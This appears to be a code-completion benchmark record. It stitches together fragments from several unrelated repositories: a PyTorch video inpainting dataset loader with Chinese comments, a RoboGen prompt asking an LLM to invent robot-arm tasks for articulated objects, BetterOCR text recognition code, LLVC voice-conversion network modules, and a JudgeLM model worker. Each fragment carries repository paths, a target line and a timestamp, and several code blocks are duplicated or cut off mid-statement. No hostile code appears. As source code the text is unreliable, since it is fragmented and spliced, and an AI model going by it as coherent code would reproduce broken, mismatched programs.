if debug or split != 'train': # 如果是调试模式或者不是训练集,只取前100个视频
self.video_names = self.video_names[:100]
# 定义数据的转换操作,转换成堆叠的张量
self._to_tensors = transforms.Compose([
Stack(),
ToTorchFormatTensor(), # 便于在PyTorch中使用的张量格式
])
def __len__(self):
# 返回数据集中视频的数量
return len(self.video_names)
def __getitem__(self, index):
# 获取一个样本项
try:
item = self.load_item(index) # 尝试加载指定索引的数据项
except:
print('Loading error in video {}'.format(self.video_names[index])) # 如果加载出错,打印出错信息
item = self.load_item(0) # 加载第一个项目作为兜底
return item
def load_item(self, index):
# 加载数据项的具体实现
video_name = self.video_names[index] # 根据索引获取视频名称
# 为所有视频帧生成帧文件名列表
all_frames = [f"{str(i).zfill(5)}.jpg" for i in range(self.video_dict[video_name])]
# 生成随机运动的随机形状的遮罩
all_masks = create_random_shape_with_random_motion(
len(all_frames), imageHeight=self.h, imageWidth=self.w)
# 获取参考帧的索引
ref_index = get_ref_index(len(all_frames), self.sample_length)
# 读取视频帧
frames = []
masks = []
for idx in ref_index:
# 读取图片,转化为RGB,调整大小并添加到列表中
|
# 自定义的数据集
class Dataset(torch.utils.data.Dataset):
def __init__(self, args: dict, split='train', debug=False):
# 初始化函数,传入配置参数字典,数据集划分类型,默认为'train'
self.args = args
self.split = split
self.sample_length = args['sample_length'] # 样本长度参数
self.size = self.w, self.h = (args['w'], args['h']) # 设置图像的目标宽高
# 打开存放数据相关信息的json文件
with open(os.path.join(args['data_root'], args['name'], split+'.json'), 'r') as f:
self.video_dict = json.load(f) # 加载json文件内容
self.video_names = list(self.video_dict.keys()) # 获取视频的名称列表
if debug or split != 'train': # 如果是调试模式或者不是训练集,只取前100个视频
self.video_names = self.video_names[:100]
# 定义数据的转换操作,转换成堆叠的张量
self._to_tensors = transforms.Compose([
Stack(),
ToTorchFormatTensor(), # 便于在PyTorch中使用的张量格式
])
def __len__(self):
# 返回数据集中视频的数量
return len(self.video_names)
def __getitem__(self, index):
# 获取一个样本项
try:
item = self.load_item(index) # 尝试加载指定索引的数据项
except:
print('Loading error in video {}'.format(self.video_names[index])) # 如果加载出错,打印出错信息
item = self.load_item(0) # 加载第一个项目作为兜底
return item
def load_item(self, index):
# 加载数据项的具体实现
video_name = self.video_names[index] # 根据索引获取视频名称
# 为所有视频帧生成帧文件名列表
all_frames = [f"{str(i).zfill(5)}.jpg" for i in range(self.video_dict[video_name])]
# 生成随机运动的随机形状的遮罩
all_masks = create_random_shape_with_random_motion(
len(all_frames), imageHeight=self.h, imageWidth=self.w)
# 获取参考帧的索引
ref_index = get_ref_index(len(all_frames), self.sample_length)
# 读取视频帧
frames = []
masks = []
for idx in ref_index:
# 读取图片,转化为RGB,调整大小并添加到列表中 | img = ZipReader.imread('{}/{}/JPEGImages/{}.zip'.format( | 0 | 2023-10-25 02:50:01+00:00 | 4k |
Genesis-Embodied-AI/RoboGen | gpt_4/prompts/prompt_manipulation.py | [
{
"identifier": "partnet_mobility_dict",
"path": "objaverse_utils/utils.py",
"snippet": ""
},
{
"identifier": "build_task_given_text",
"path": "gpt_4/prompts/utils.py",
"snippet": "def build_task_given_text(object_category, task_name, task_description, additional_object, involved_links, ... | import numpy as np
import copy
import time, datetime
import os
import json
from objaverse_utils.utils import partnet_mobility_dict
from gpt_4.prompts.utils import build_task_given_text, parse_task_response
from gpt_4.query import query | 3,491 |
task_user_contents = """
I will give you an articulated object, with its articulation tree and semantics. Your goal is to imagine some tasks that a robotic arm can perform with this articulated object in household scenarios. You can think of the robotic arm as a Franka Panda robot. The task will be built in a simulator for the robot to learn it.
Focus on manipulation or interaction with the object itself. Sometimes the object will have functions, e.g., a microwave can be used to heat food, in these cases, feel free to include other objects that are needed for the task.
Please do not think of tasks that try to assemble or disassemble the object. Do not think of tasks that aim to clean the object or check its functionality.
For each task you imagined, please write in the following format:
Task name: the name of the task.
Description: some basic descriptions of the tasks.
Additional Objects: Additional objects other than the provided articulated object required for completing the task.
Links: Links of the articulated objects that are required to perform the task.
- Link 1: reasons why this link is needed for the task
- Link 2: reasons why this link is needed for the task
- …
Joints: Joints of the articulated objects that are required to perform the task.
- Joint 1: reasons why this joint is needed for the task
- Joint 2: reasons why this joint is needed for the task
- …
Example Input:
```Oven articulation tree
links:
base
link_0
link_1
link_2
link_3
link_4
link_5
link_6
link_7
joints:
joint_name: joint_0 joint_type: revolute parent_link: link_7 child_link: link_0
joint_name: joint_1 joint_type: continuous parent_link: link_7 child_link: link_1
joint_name: joint_2 joint_type: continuous parent_link: link_7 child_link: link_2
joint_name: joint_3 joint_type: continuous parent_link: link_7 child_link: link_3
joint_name: joint_4 joint_type: continuous parent_link: link_7 child_link: link_4
joint_name: joint_5 joint_type: continuous parent_link: link_7 child_link: link_5
joint_name: joint_6 joint_type: continuous parent_link: link_7 child_link: link_6
joint_name: joint_7 joint_type: fixed parent_link: base child_link: link_7
```
```Oven semantics
link_0 hinge door
link_1 hinge knob
link_2 hinge knob
link_3 hinge knob
link_4 hinge knob
link_5 hinge knob
link_6 hinge knob
link_7 heavy oven_body
```
Example output:
Task Name: Open Oven Door
Description: The robotic arm will open the oven door.
Additional Objects: None
Links:
- link_0: from the semantics, this is the door of the oven. The robot needs to approach this door in order to open it.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0. Therefore, the robot needs to actuate this joint for opening the door.
Task Name: Adjust Oven Temperature
Description: The robotic arm will turn one of the oven's hinge knobs to set a desired temperature.
Additional Objects: None
Links:
- link_1: the robot needs to approach link_1, which is assumed to be the temperature knob, to rotate it to set the temperature.
Joints:
- joint_1: joint_1 connects link_1 from the articulation tree. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Heat a hamburger Inside Oven
Description: The robot arm places a hamburger inside the oven, and sets the oven temperature to be appropriate for heating the hamburger.
Additional Objects: hamburger
Links:
- link_0: link_0 is the oven door from the semantics. The robot needs to open the door in order to put the hamburger inside the oven.
link_1: the robot needs to approach link_1, which is the temperature knob, to rotate it to set the desired temperature.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0 (the door). Therefore, the robot needs to actuate this joint for opening the door.
- joint_1: from the articulation tree, joint_1 connects link_1, which is the temperature knob. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Set Oven Timer
Description: The robot arm turns a timer knob to set cooking time for the food.
Additional Objects: None.
Links:
- link_2: link_2 is assumed to be the knob for controlling the cooking time. The robot needs to approach link_2 to set the cooking time.
Joints:
- joint_2: from the articulation tree, joint_2 connects link_2. The robot needs to actuate joint_2 to rotate link_2 to the desired position, setting the oven timer.
Can you do the same for the following object:
"""
# TODO: add another example where the ambiguous description is changed to be a precise description of the object.
def generate_task(object_category=None, object_path=None, existing_response=None, temperature_dict=None,
model_dict=None, meta_path="generated_tasks"):
# send the object articulation tree, semantics file and get task descriptions, invovled objects and joints
# randomly sample an object for generation.
|
task_user_contents = """
I will give you an articulated object, with its articulation tree and semantics. Your goal is to imagine some tasks that a robotic arm can perform with this articulated object in household scenarios. You can think of the robotic arm as a Franka Panda robot. The task will be built in a simulator for the robot to learn it.
Focus on manipulation or interaction with the object itself. Sometimes the object will have functions, e.g., a microwave can be used to heat food, in these cases, feel free to include other objects that are needed for the task.
Please do not think of tasks that try to assemble or disassemble the object. Do not think of tasks that aim to clean the object or check its functionality.
For each task you imagined, please write in the following format:
Task name: the name of the task.
Description: some basic descriptions of the tasks.
Additional Objects: Additional objects other than the provided articulated object required for completing the task.
Links: Links of the articulated objects that are required to perform the task.
- Link 1: reasons why this link is needed for the task
- Link 2: reasons why this link is needed for the task
- …
Joints: Joints of the articulated objects that are required to perform the task.
- Joint 1: reasons why this joint is needed for the task
- Joint 2: reasons why this joint is needed for the task
- …
Example Input:
```Oven articulation tree
links:
base
link_0
link_1
link_2
link_3
link_4
link_5
link_6
link_7
joints:
joint_name: joint_0 joint_type: revolute parent_link: link_7 child_link: link_0
joint_name: joint_1 joint_type: continuous parent_link: link_7 child_link: link_1
joint_name: joint_2 joint_type: continuous parent_link: link_7 child_link: link_2
joint_name: joint_3 joint_type: continuous parent_link: link_7 child_link: link_3
joint_name: joint_4 joint_type: continuous parent_link: link_7 child_link: link_4
joint_name: joint_5 joint_type: continuous parent_link: link_7 child_link: link_5
joint_name: joint_6 joint_type: continuous parent_link: link_7 child_link: link_6
joint_name: joint_7 joint_type: fixed parent_link: base child_link: link_7
```
```Oven semantics
link_0 hinge door
link_1 hinge knob
link_2 hinge knob
link_3 hinge knob
link_4 hinge knob
link_5 hinge knob
link_6 hinge knob
link_7 heavy oven_body
```
Example output:
Task Name: Open Oven Door
Description: The robotic arm will open the oven door.
Additional Objects: None
Links:
- link_0: from the semantics, this is the door of the oven. The robot needs to approach this door in order to open it.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0. Therefore, the robot needs to actuate this joint for opening the door.
Task Name: Adjust Oven Temperature
Description: The robotic arm will turn one of the oven's hinge knobs to set a desired temperature.
Additional Objects: None
Links:
- link_1: the robot needs to approach link_1, which is assumed to be the temperature knob, to rotate it to set the temperature.
Joints:
- joint_1: joint_1 connects link_1 from the articulation tree. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Heat a hamburger Inside Oven
Description: The robot arm places a hamburger inside the oven, and sets the oven temperature to be appropriate for heating the hamburger.
Additional Objects: hamburger
Links:
- link_0: link_0 is the oven door from the semantics. The robot needs to open the door in order to put the hamburger inside the oven.
link_1: the robot needs to approach link_1, which is the temperature knob, to rotate it to set the desired temperature.
Joints:
- joint_0: from the articulation tree, this is the revolute joint that connects link_0 (the door). Therefore, the robot needs to actuate this joint for opening the door.
- joint_1: from the articulation tree, joint_1 connects link_1, which is the temperature knob. The robot needs to actuate it to rotate link_1 to the desired temperature.
Task Name: Set Oven Timer
Description: The robot arm turns a timer knob to set cooking time for the food.
Additional Objects: None.
Links:
- link_2: link_2 is assumed to be the knob for controlling the cooking time. The robot needs to approach link_2 to set the cooking time.
Joints:
- joint_2: from the articulation tree, joint_2 connects link_2. The robot needs to actuate joint_2 to rotate link_2 to the desired position, setting the oven timer.
Can you do the same for the following object:
"""
# TODO: add another example where the ambiguous description is changed to be a precise description of the object.
def generate_task(object_category=None, object_path=None, existing_response=None, temperature_dict=None,
model_dict=None, meta_path="generated_tasks"):
# send the object articulation tree, semantics file and get task descriptions, invovled objects and joints
# randomly sample an object for generation.
| object_cetegories = list(partnet_mobility_dict.keys()) | 0 | 2023-10-31 19:44:09+00:00 | 4k |
junhoyeo/BetterOCR | betterocr/engines/easy_pororo_ocr/pororo/models/brainOCR/recognition.py | [
{
"identifier": "Model",
"path": "betterocr/engines/easy_pororo_ocr/pororo/models/brainOCR/model.py",
"snippet": "class Model(nn.Module):\n def __init__(self, opt2val: dict):\n super(Model, self).__init__()\n\n input_channel = opt2val[\"input_channel\"]\n output_channel = opt2val... | import math
import numpy as np
import torch
import torch.nn.functional as F
import torch.utils.data
import torchvision.transforms as transforms
from PIL import Image
from .model import Model
from .utils import CTCLabelConverter
from collections import OrderedDict | 2,747 | def __init__(self, max_size, PAD_type: str = "right"):
self.toTensor = transforms.ToTensor()
self.max_size = max_size
self.max_width_half = math.floor(max_size[2] / 2)
self.PAD_type = PAD_type
def __call__(self, img):
img = self.toTensor(img)
img.sub_(0.5).div_(0.5)
c, h, w = img.size()
Pad_img = torch.FloatTensor(*self.max_size).fill_(0)
Pad_img[:, :, :w] = img # right pad
if self.max_size[2] != w: # add border Pad
Pad_img[:, :, w:] = (
img[:, :, w - 1]
.unsqueeze(2)
.expand(
c,
h,
self.max_size[2] - w,
)
)
return Pad_img
class ListDataset(torch.utils.data.Dataset):
def __init__(self, image_list: list):
self.image_list = image_list
self.nSamples = len(image_list)
def __len__(self):
return self.nSamples
def __getitem__(self, index):
img = self.image_list[index]
return Image.fromarray(img, "L")
class AlignCollate(object):
def __init__(self, imgH: int, imgW: int, adjust_contrast: float):
self.imgH = imgH
self.imgW = imgW
self.keep_ratio_with_pad = True # Do Not Change
self.adjust_contrast = adjust_contrast
def __call__(self, batch):
batch = filter(lambda x: x is not None, batch)
images = batch
resized_max_w = self.imgW
input_channel = 1
transform = NormalizePAD((input_channel, self.imgH, resized_max_w))
resized_images = []
for image in images:
w, h = image.size
# augmentation here - change contrast
if self.adjust_contrast > 0:
image = np.array(image.convert("L"))
image = adjust_contrast_grey(image, target=self.adjust_contrast)
image = Image.fromarray(image, "L")
ratio = w / float(h)
if math.ceil(self.imgH * ratio) > self.imgW:
resized_w = self.imgW
else:
resized_w = math.ceil(self.imgH * ratio)
resized_image = image.resize((resized_w, self.imgH), Image.BICUBIC)
resized_images.append(transform(resized_image))
image_tensors = torch.cat([t.unsqueeze(0) for t in resized_images], 0)
return image_tensors
def recognizer_predict(model, converter, test_loader, opt2val: dict):
device = opt2val["device"]
model.eval()
result = []
with torch.no_grad():
for image_tensors in test_loader:
batch_size = image_tensors.size(0)
inputs = image_tensors.to(device)
preds = model(inputs) # (N, length, num_classes)
# rebalance
preds_prob = F.softmax(preds, dim=2)
preds_prob = preds_prob.cpu().detach().numpy()
pred_norm = preds_prob.sum(axis=2)
preds_prob = preds_prob / np.expand_dims(pred_norm, axis=-1)
preds_prob = torch.from_numpy(preds_prob).float().to(device)
# Select max probabilty (greedy decoding), then decode index to character
preds_lengths = torch.IntTensor([preds.size(1)] * batch_size) # (N,)
_, preds_indices = preds_prob.max(2) # (N, length)
preds_indices = preds_indices.view(-1) # (N*length)
preds_str = converter.decode_greedy(preds_indices, preds_lengths)
preds_max_prob, _ = preds_prob.max(dim=2)
for pred, pred_max_prob in zip(preds_str, preds_max_prob):
confidence_score = pred_max_prob.cumprod(dim=0)[-1]
result.append([pred, confidence_score.item()])
return result
def get_recognizer(opt2val: dict):
"""
:return:
recognizer: recognition net
converter: CTCLabelConverter
"""
# converter
vocab = opt2val["vocab"]
converter = CTCLabelConverter(vocab)
# recognizer
| """
this code is adapted from https://github.com/black7375/korean_ocr_using_pororo
Apache License 2.0 @yunwoong7
Apache License 2.0 @black7375
"""
"""
This code is adapted from https://github.com/JaidedAI/EasyOCR/blob/8af936ba1b2f3c230968dc1022d0cd3e9ca1efbb/easyocr/recognition.py
"""
def contrast_grey(img):
high = np.percentile(img, 90)
low = np.percentile(img, 10)
return (high - low) / np.maximum(10, high + low), high, low
def adjust_contrast_grey(img, target: float = 0.4):
contrast, high, low = contrast_grey(img)
if contrast < target:
img = img.astype(int)
ratio = 200.0 / np.maximum(10, high - low)
img = (img - low + 25) * ratio
img = np.maximum(
np.full(img.shape, 0),
np.minimum(
np.full(img.shape, 255),
img,
),
).astype(np.uint8)
return img
class NormalizePAD(object):
def __init__(self, max_size, PAD_type: str = "right"):
self.toTensor = transforms.ToTensor()
self.max_size = max_size
self.max_width_half = math.floor(max_size[2] / 2)
self.PAD_type = PAD_type
def __call__(self, img):
img = self.toTensor(img)
img.sub_(0.5).div_(0.5)
c, h, w = img.size()
Pad_img = torch.FloatTensor(*self.max_size).fill_(0)
Pad_img[:, :, :w] = img # right pad
if self.max_size[2] != w: # add border Pad
Pad_img[:, :, w:] = (
img[:, :, w - 1]
.unsqueeze(2)
.expand(
c,
h,
self.max_size[2] - w,
)
)
return Pad_img
class ListDataset(torch.utils.data.Dataset):
def __init__(self, image_list: list):
self.image_list = image_list
self.nSamples = len(image_list)
def __len__(self):
return self.nSamples
def __getitem__(self, index):
img = self.image_list[index]
return Image.fromarray(img, "L")
class AlignCollate(object):
def __init__(self, imgH: int, imgW: int, adjust_contrast: float):
self.imgH = imgH
self.imgW = imgW
self.keep_ratio_with_pad = True # Do Not Change
self.adjust_contrast = adjust_contrast
def __call__(self, batch):
batch = filter(lambda x: x is not None, batch)
images = batch
resized_max_w = self.imgW
input_channel = 1
transform = NormalizePAD((input_channel, self.imgH, resized_max_w))
resized_images = []
for image in images:
w, h = image.size
# augmentation here - change contrast
if self.adjust_contrast > 0:
image = np.array(image.convert("L"))
image = adjust_contrast_grey(image, target=self.adjust_contrast)
image = Image.fromarray(image, "L")
ratio = w / float(h)
if math.ceil(self.imgH * ratio) > self.imgW:
resized_w = self.imgW
else:
resized_w = math.ceil(self.imgH * ratio)
resized_image = image.resize((resized_w, self.imgH), Image.BICUBIC)
resized_images.append(transform(resized_image))
image_tensors = torch.cat([t.unsqueeze(0) for t in resized_images], 0)
return image_tensors
def recognizer_predict(model, converter, test_loader, opt2val: dict):
device = opt2val["device"]
model.eval()
result = []
with torch.no_grad():
for image_tensors in test_loader:
batch_size = image_tensors.size(0)
inputs = image_tensors.to(device)
preds = model(inputs) # (N, length, num_classes)
# rebalance
preds_prob = F.softmax(preds, dim=2)
preds_prob = preds_prob.cpu().detach().numpy()
pred_norm = preds_prob.sum(axis=2)
preds_prob = preds_prob / np.expand_dims(pred_norm, axis=-1)
preds_prob = torch.from_numpy(preds_prob).float().to(device)
# Select max probabilty (greedy decoding), then decode index to character
preds_lengths = torch.IntTensor([preds.size(1)] * batch_size) # (N,)
_, preds_indices = preds_prob.max(2) # (N, length)
preds_indices = preds_indices.view(-1) # (N*length)
preds_str = converter.decode_greedy(preds_indices, preds_lengths)
preds_max_prob, _ = preds_prob.max(dim=2)
for pred, pred_max_prob in zip(preds_str, preds_max_prob):
confidence_score = pred_max_prob.cumprod(dim=0)[-1]
result.append([pred, confidence_score.item()])
return result
def get_recognizer(opt2val: dict):
"""
:return:
recognizer: recognition net
converter: CTCLabelConverter
"""
# converter
vocab = opt2val["vocab"]
converter = CTCLabelConverter(vocab)
# recognizer | recognizer = Model(opt2val) | 0 | 2023-10-26 11:26:25+00:00 | 4k |
KoeAI/LLVC | minimal_rvc/modules.py | [
{
"identifier": "get_padding",
"path": "minimal_rvc/commons.py",
"snippet": "def get_padding(kernel_size, dilation=1):\n return int((kernel_size * dilation - dilation) / 2)"
},
{
"identifier": "init_weights",
"path": "minimal_rvc/commons.py",
"snippet": "def init_weights(m, mean=0.0, ... | import math
import torch
from torch import nn
from torch.nn import Conv1d
from torch.nn import functional as F
from torch.nn.utils import remove_weight_norm, weight_norm
from . import commons
from .commons import get_padding, init_weights
from .transforms import piecewise_rational_quadratic_transform | 2,261 | dilation_rate,
n_layers,
gin_channels=0,
p_dropout=0,
):
super(WN, self).__init__()
assert kernel_size % 2 == 1
self.hidden_channels = hidden_channels
self.kernel_size = (kernel_size,)
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(
gin_channels, 2 * hidden_channels * n_layers, 1
)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight")
for i in range(n_layers):
dilation = dilation_rate**i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(
hidden_channels,
2 * hidden_channels,
kernel_size,
dilation=dilation,
padding=padding,
)
in_layer = torch.nn.utils.weight_norm(in_layer, name="weight")
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight")
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:, : self.hidden_channels, :]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:, self.hidden_channels :, :]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList(
[
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2]),
)
),
]
)
| # This module is based on code from ddPn08, liujing04, and teftef6220
# https://github.com/ddPn08/rvc-webui
# https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI
# https://github.com/teftef6220/Voice_Separation_and_Selection
# These modules are licensed under the MIT License.
LRELU_SLOPE = 0.1
class LayerNorm(nn.Module):
def __init__(self, channels, eps=1e-5):
super().__init__()
self.channels = channels
self.eps = eps
self.gamma = nn.Parameter(torch.ones(channels))
self.beta = nn.Parameter(torch.zeros(channels))
def forward(self, x):
x = x.transpose(1, -1)
x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps)
return x.transpose(1, -1)
class ConvReluNorm(nn.Module):
def __init__(
self,
in_channels,
hidden_channels,
out_channels,
kernel_size,
n_layers,
p_dropout,
):
super().__init__()
self.in_channels = in_channels
self.hidden_channels = hidden_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
assert n_layers > 1, "Number of layers should be larger than 0."
self.conv_layers = nn.ModuleList()
self.norm_layers = nn.ModuleList()
self.conv_layers.append(
nn.Conv1d(
in_channels, hidden_channels, kernel_size, padding=kernel_size // 2
)
)
self.norm_layers.append(LayerNorm(hidden_channels))
self.relu_drop = nn.Sequential(nn.ReLU(), nn.Dropout(p_dropout))
for _ in range(n_layers - 1):
self.conv_layers.append(
nn.Conv1d(
hidden_channels,
hidden_channels,
kernel_size,
padding=kernel_size // 2,
)
)
self.norm_layers.append(LayerNorm(hidden_channels))
self.proj = nn.Conv1d(hidden_channels, out_channels, 1)
self.proj.weight.data.zero_()
self.proj.bias.data.zero_()
def forward(self, x, x_mask):
x_org = x
for i in range(self.n_layers):
x = self.conv_layers[i](x * x_mask)
x = self.norm_layers[i](x)
x = self.relu_drop(x)
x = x_org + self.proj(x)
return x * x_mask
class DDSConv(nn.Module):
"""
Dialted and Depth-Separable Convolution
"""
def __init__(self, channels, kernel_size, n_layers, p_dropout=0.0):
super().__init__()
self.channels = channels
self.kernel_size = kernel_size
self.n_layers = n_layers
self.p_dropout = p_dropout
self.drop = nn.Dropout(p_dropout)
self.convs_sep = nn.ModuleList()
self.convs_1x1 = nn.ModuleList()
self.norms_1 = nn.ModuleList()
self.norms_2 = nn.ModuleList()
for i in range(n_layers):
dilation = kernel_size**i
padding = (kernel_size * dilation - dilation) // 2
self.convs_sep.append(
nn.Conv1d(
channels,
channels,
kernel_size,
groups=channels,
dilation=dilation,
padding=padding,
)
)
self.convs_1x1.append(nn.Conv1d(channels, channels, 1))
self.norms_1.append(LayerNorm(channels))
self.norms_2.append(LayerNorm(channels))
def forward(self, x, x_mask, g=None):
if g is not None:
x = x + g
for i in range(self.n_layers):
y = self.convs_sep[i](x * x_mask)
y = self.norms_1[i](y)
y = F.gelu(y)
y = self.convs_1x1[i](y)
y = self.norms_2[i](y)
y = F.gelu(y)
y = self.drop(y)
x = x + y
return x * x_mask
class WN(torch.nn.Module):
def __init__(
self,
hidden_channels,
kernel_size,
dilation_rate,
n_layers,
gin_channels=0,
p_dropout=0,
):
super(WN, self).__init__()
assert kernel_size % 2 == 1
self.hidden_channels = hidden_channels
self.kernel_size = (kernel_size,)
self.dilation_rate = dilation_rate
self.n_layers = n_layers
self.gin_channels = gin_channels
self.p_dropout = p_dropout
self.in_layers = torch.nn.ModuleList()
self.res_skip_layers = torch.nn.ModuleList()
self.drop = nn.Dropout(p_dropout)
if gin_channels != 0:
cond_layer = torch.nn.Conv1d(
gin_channels, 2 * hidden_channels * n_layers, 1
)
self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight")
for i in range(n_layers):
dilation = dilation_rate**i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(
hidden_channels,
2 * hidden_channels,
kernel_size,
dilation=dilation,
padding=padding,
)
in_layer = torch.nn.utils.weight_norm(in_layer, name="weight")
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight")
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:, : self.hidden_channels, :]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:, self.hidden_channels :, :]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList(
[
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2]),
)
),
]
) | self.convs1.apply(init_weights) | 1 | 2023-10-28 01:58:49+00:00 | 4k |
aurelio-labs/semantic-router | semantic_router/layer.py | [
{
"identifier": "BaseEncoder",
"path": "semantic_router/encoders/base.py",
"snippet": "class BaseEncoder(BaseModel):\n name: str\n score_threshold: float\n type: str = Field(default=\"base\")\n\n class Config:\n arbitrary_types_allowed = True\n\n def __call__(self, docs: List[str])... | import json
import os
import numpy as np
import yaml
from typing import Any, Dict, List, Optional, Tuple
from semantic_router.encoders import BaseEncoder, OpenAIEncoder
from semantic_router.linear import similarity_matrix, top_scores
from semantic_router.llms import BaseLLM, OpenAILLM
from semantic_router.route import Route
from semantic_router.schema import Encoder, EncoderType, RouteChoice
from semantic_router.utils.logger import logger | 3,327 |
def is_valid(layer_config: str) -> bool:
"""Make sure the given string is json format and contains the 3 keys: ["encoder_name", "encoder_type", "routes"]"""
try:
output_json = json.loads(layer_config)
required_keys = ["encoder_name", "encoder_type", "routes"]
if isinstance(output_json, list):
for item in output_json:
missing_keys = [key for key in required_keys if key not in item]
if missing_keys:
|
def is_valid(layer_config: str) -> bool:
"""Make sure the given string is json format and contains the 3 keys: ["encoder_name", "encoder_type", "routes"]"""
try:
output_json = json.loads(layer_config)
required_keys = ["encoder_name", "encoder_type", "routes"]
if isinstance(output_json, list):
for item in output_json:
missing_keys = [key for key in required_keys if key not in item]
if missing_keys: | logger.warning( | 10 | 2023-10-30 12:12:45+00:00 | 4k |
baaivision/JudgeLM | judgelm/serve/model_worker.py | [
{
"identifier": "WORKER_HEART_BEAT_INTERVAL",
"path": "judgelm/constants.py",
"snippet": "WORKER_HEART_BEAT_INTERVAL = int(os.getenv(\"JUDGELM_WORKER_HEART_BEAT_INTERVAL\", 45))"
},
{
"identifier": "ErrorCode",
"path": "judgelm/constants.py",
"snippet": "class ErrorCode(IntEnum):\n \"... | import argparse
import asyncio
import dataclasses
import logging
import json
import os
import time
import threading
import uuid
import requests
import torch
import torch.nn.functional as F
import uvicorn
from typing import List
from fastapi import FastAPI, Request, BackgroundTasks
from fastapi.responses import StreamingResponse, JSONResponse
from transformers import (
AutoTokenizer,
AutoModelForCausalLM,
LlamaTokenizer,
AutoModel,
)
from transformers import (
AutoTokenizer,
AutoModelForCausalLM,
LLaMATokenizer,
AutoModel,
)
from judgelm.constants import WORKER_HEART_BEAT_INTERVAL, ErrorCode, SERVER_ERROR_MSG
from judgelm.conversation import get_conv_template
from judgelm.model.model_adapter import (
load_model,
add_model_args,
get_conversation_template,
get_generate_stream_function,
)
from judgelm.modules.gptq import GptqConfig
from judgelm.utils import build_logger, pretty_print_semaphore, get_context_length | 3,453 | self.context_len = None
self.call_ct = 0
self.semaphore = None
self.heart_beat_thread = None
def init_heart_beat(self):
self.register_to_controller()
self.heart_beat_thread = threading.Thread(
target=heart_beat_worker, args=(self,)
)
self.heart_beat_thread.start()
def register_to_controller(self):
logger.info("Register to controller")
url = self.controller_addr + "/register_worker"
data = {
